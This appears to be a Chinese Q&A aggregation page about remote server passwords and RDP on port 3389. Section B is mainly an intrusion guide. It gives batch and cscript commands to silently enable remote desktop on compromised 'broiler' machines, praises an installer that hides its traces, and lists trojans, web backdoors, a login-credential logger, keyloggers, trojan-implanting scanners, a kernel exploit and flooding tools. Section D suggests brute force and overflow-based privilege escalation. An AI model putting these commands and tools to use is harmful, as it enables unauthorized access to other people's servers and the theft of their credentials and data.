A. 伺服器被人遠程登錄並被修改了登陸密碼 我該怎麼辦
這個很好解決的。直接找到你的伺服器租用商,讓機房幫你破解下密碼就可以了。伺服器所有權是你的,機房承認的也只是你。趕緊抓緊時間聯系機房吧,說不定要盜取你的數據呢。
B. 怎樣破解3389遠程登陸密碼
1.怎麼樣開3389埠,這里我把他們總結一下,很全面,希望對你有用:
1,打開記事本,編輯內容如下:
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
編輯好後存為BAT文件,上傳至肉雞,執行。這里值得注意的是要確定winnt是否在c盤,如果在其他盤則需要改動。
2 (對xp\2000都有效) 腳本文件 本地開3389 工具:rots1.05
使用方法:
在命令行方式下使用windows自帶的腳本宿主程序cscript.exe調用腳本,例如:
c:\>cscript ROTS.vbs <目標IP> <用戶名> <密碼> [服務埠] [自動重起選項]
服務埠: 設置終端服務的服務埠。默認是3389。
自動重起選項: 使用/r表示安裝完成後自動重起目標使設置生效。
使用/fr表示強制重起目標。(如果/r不行,可以試試這個)
使用此參數時,埠設置不能忽略。
比如掃描到了一個有NT弱口令的伺服器,IP地址是222.222.222.222,管理員帳戶是administrator,密碼為空
運行CMD(2000下的DOS),我們給它開終端!
命令如下!
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令應該可以理解吧?cscript reg.vbe這是命令,後面的是IP,然後是管理員帳戶,接這是密碼,因為222.222.222.222 這台伺服器的管理員密碼是空的,那就用雙引號表示為空,再後面是埠,你可以任意設置終端的埠,/fr是重啟命令(強制重啟,一般我都用這個,你也可以/r,這是普通重啟)
腳本會判斷目標系統類型,如果不是server及以上版本,就會提示你是否要取消。
因為pro版不能安裝終端服務。
如果你確信腳本判斷錯誤,就繼續安裝好了。
如果要對本地使用,IP地址為127.0.0.1或者一個點(用.表示),用戶名和密碼都為空(用""表示)。
腳本訪問的目標的135埠,如果目標135埠未開放,或者WMI服務關閉,那麼腳本就沒用了。
3,下載3389自動安裝程序-djshao正式版5.0
說明:
解壓djshao5.0.zip,用你的隨便什麼方法把把解壓出來的djxyxs.exe上傳到肉雞的c:\winnt\temp下,然後進入c:\winnt\temp目錄執行djxyxs.exe解壓縮文件,然後再執行解壓縮出來的azzd.exe文件,等一會肉雞會自動重啟!重啟後會出現終端服務!
特點:1、不用修改注冊表的安裝路徑,注冊表會自動修改,安裝完後會自動恢復到原來的安裝路徑,2、在後台安靜模式運行,就算肉雞旁有人也沒有關系!3、在添加和刪除中看不出終端服務被安裝的痕跡,也就是啟動終端前不會打鉤,4、不會在肉雞上留下你的上傳文件,在安裝完終端服務後會會自動刪除你上傳到c:\winnt\temp下的任何文件!5、不管肉雞的winnt裝在什麼盤上都無所謂!6、安裝完終端後會刪除在管理工具中的終端快捷圖標!7、在沒有安裝終端前,終端服務是被禁止的!安裝終端後,終端服務被改為自動!但是如果在安裝前終端服務是手動!安裝後就可能還是手動!等重啟後就不會打開服務!所以在軟體中加了sc指令,等安裝完後,不管終端服務是禁止還是手動還是自動,全部改為自動。8、自動檢測肉雞是不是伺服器版,如果不是刪除原文件,不執行安裝,如果是伺服器版就執行安裝!9、支持中日韓繁四個版本的win2000伺服器版!
4,下載DameWare NT Utilities 3.66.0.0 注冊版
安裝注冊完畢後輸入對方IP用戶名密碼,等待出現是否安裝的對話框點是。
復制啟動後出現對方桌面。
在對方桌面進入控制面版,點添加或刪除程序。進入後點添加/刪除windows組件,找到終端服務,點際進入後在啟動終端服務上打上勾。確定自動提示重起,重起後OK
5.運用遠程開啟3389軟體開啟(需要有對方機子的管理員帳號和密碼)
6.在自己機上安裝一個20cn的ftp伺服器,在對方的dos下將本機的3389開啟工具下載到對方機子,然後執行.
2.CGI後門:
cgi網頁後門 cgi網頁後門,envymask編寫...《
網頁合並器 本程序可以自動生成網頁,可以把網頁和EXE合成新的網頁,在打開網頁的同時自動運行EXE文件.你將木馬合並在一個網頁中,別人瀏覽之後,呵呵,我什麼都沒說~~~
海陽頂端網木馬 windows環境下永遠不會被查殺的木馬,因為它是用asp做的,也是一套asp在線極好的網頁編輯軟體,支持在線更改、編輯、刪除任意文本文件,同時最重要的是解決了無組件asp上傳...(中文版
cgi-backdoor 幾個cgi木馬(十多種利用最新漏洞的web腳本後門,涵蓋jsp,php,asp,cgi等等) *
命令行後門類
winshell
WinShell是一個運行在Windows平台上的Telnet伺服器軟體,主程序是一個僅僅5k左右的可執行文件,可完全獨立執行而不依賴於任何系統動態連接庫,盡管它體積小小,卻功能不凡,支持定製埠、密碼保護、多用戶登錄、NT服務方式、遠程文件下載、信息自定義及獨特的反DDOS功能等...《入侵NT中winshell的使用》
Gina
Gina木馬的主要作用是在系統用戶登陸時,將用戶登陸的名字,登陸密碼等記錄到文件中去,因為這個DLL是在登陸時載入,所以不存在象findpass那類程序在用戶名字是中文或域名是中文等無法得到用戶...儒
Wollf1.5 我們的一位女黑客寫的軟體,擴展Telnet服務,集成文件傳輸、Ftp伺服器、鍵盤記錄、Sniffer(for win2k only)、埠轉發等功能,可反向連接,可通過參數選擇隨系統啟動或作為普通進程啟動
WinEggDrop Shell 1.50最終版在 一個擴展型的telnet後門程序{中國最強的後門}
**********************************************************************************************
菜鳥掃描軟體!
20CN IPC 掃描器正式版
全自動IPC掃描器,可以同步植入木馬,可以透過部分沒有配置完整的防火牆,能夠探測流光探測不到的一些用戶...(中文版)
網路肉雞獵手
一個快速查找網路肉雞的小工具
網頁信息神探 使得網頁不再有秘密,各種信息一目瞭然,什麼電影、圖片、Email地址、文章、Flash、壓縮文件、可執行文件...等等的鏈接地址無處可藏!連續而快速下載各種軟體、打包教程、VB、VC、動畫教程、Flash、電影、寫真圖片
**************************************************************************************
SQL2.exe SQL蠕重聽過吧,就是的這個漏洞!
NetScanTools 一款功能強大的網路工具包...(英文版)
dvbbs.exe
動網logout.asp利用程序
THCsql
針對David Litchfield發現的MSSQL OpenDataSource函數漏洞的攻擊程序,內含源代碼。
小紫V2.0追加版
*小紫*(LB論壇噩夢)V2.0追加版加入LB.EXE,可以獲得論壇管理員許可權。
LB5論壇轟炸機
我兄弟寫的程序,{推存}
LB5論壇轟炸機修正版2.5在LB5論壇轟炸機修正版2.0的原有功能基礎上增加以下功能及特性:1同時支持6線程轟炸,速度可比V2.0提高一倍以上 2機器智能重新增加,帶有自動轉向定位功能 3增加監視窗口 4標題可改...(
MSN 消息攻擊機
這是一個用於MSN Messenger 的消息攻擊機(其實不局限於MSN 的),它具有超快的攻擊速度,據測試,在普通Pentium 200 MMX 攻擊速度可以達到5條/秒。而且軟體體積極小,有效節省系統資源...(
怪狗專用版3389登陸器 我改的一個小程序,有用戶名密碼,用它可以3389登陸win系統,(必備)
DameWare NT Utilities
一款功能強大的Windows NT/2000/XP 伺服器遠程式控制制軟體,只要擁有一個遠程主機的管理帳號,就能使用它遠程GUI下登陸交互控制主機...(英文版)《
追捕: 找到IP所在地!
柳葉擦眼
這個小軟體可以列出系統所有的進程(包括隱藏的),並可以殺死進程.這個是共享軟體...(中文版)《讓傳奇木馬走開》
Xdebug ey4s大哥寫的windows 2000 kernel exploit,有了它提升許可權就簡單了!
代理之狐 可得到最新代理,用於隱藏真實IP,不過,有能力最好自己在肉機上做個代理安全!
HackerDicBuilder 本軟體屬於一款字典製作工具,根據國人設置密碼的習慣,利用線程技術,生成字典文件 ... (中文版) 多位朋友點播
scanipc 這個是木頭見過的最傻瓜化的入侵軟體了,只要設置好你要上傳的後門和IP范圍,它就會開始工作了,界面簡單實用,全自動IPC掃描器,可以同步植入木馬,可以透過部分沒有配置完整的防火牆,能夠探測流光探測不到的一些用戶 ...
Tiny Honeypot 這是一款簡單的蜜罐程序,主要基於iptables的重定向和一個xinetd監聽程序,它監聽當前沒有使用的每個TCP埠記錄所有的活動信息,並且提供一些回送信息給入
C. 遠程網路伺服器期貨指標怎麼破解
破解方法:
1、首先,在「開始」菜單中的搜索或者運行裡面輸入mstsc.exe命令。
2、點擊打開,進入到遠程桌面連接界面。
3、點擊左下方的選項擴大界面會出現如下圖的用戶名輸入框,在遠程桌面連接框的計算機欄右邊輸入你的伺服器ip,比如120.121.1.25用戶名上輸入:administrator(一般默認的是這個,除非修改了)再點擊下方的連接按鈕。
4、這時就會進入到輸入密碼環節輸入雲伺服器密碼,點擊確定按鈕。
5、因為安全性因素,一般在這時會彈出一個風險提示框,點擊是按鈕即可。
6、點擊按鈕後,若是伺服器ip、賬號、密碼都輸入正確,就會進入到伺服器裡面了。
D. 怎麼遠程破解伺服器開機密碼!
暴力破解這個太麻煩,我重來不做暴力破解這個工作。你要做我沒辦法,要開有3389的埠機器,你可以利用暴力破解軟體破解。不過建議你弄清楚這個機器有些什麼程序,(我想你可能是內部管理員吧,這個應該知道)。利用溢出攻擊,進行益出,當然要沒有打相應的補丁才行。
益處方式很多,比如:sql溢出等。
還有如果你用的是serv_u的話你可以利用FTP提權工具進行提權,重建用戶密碼!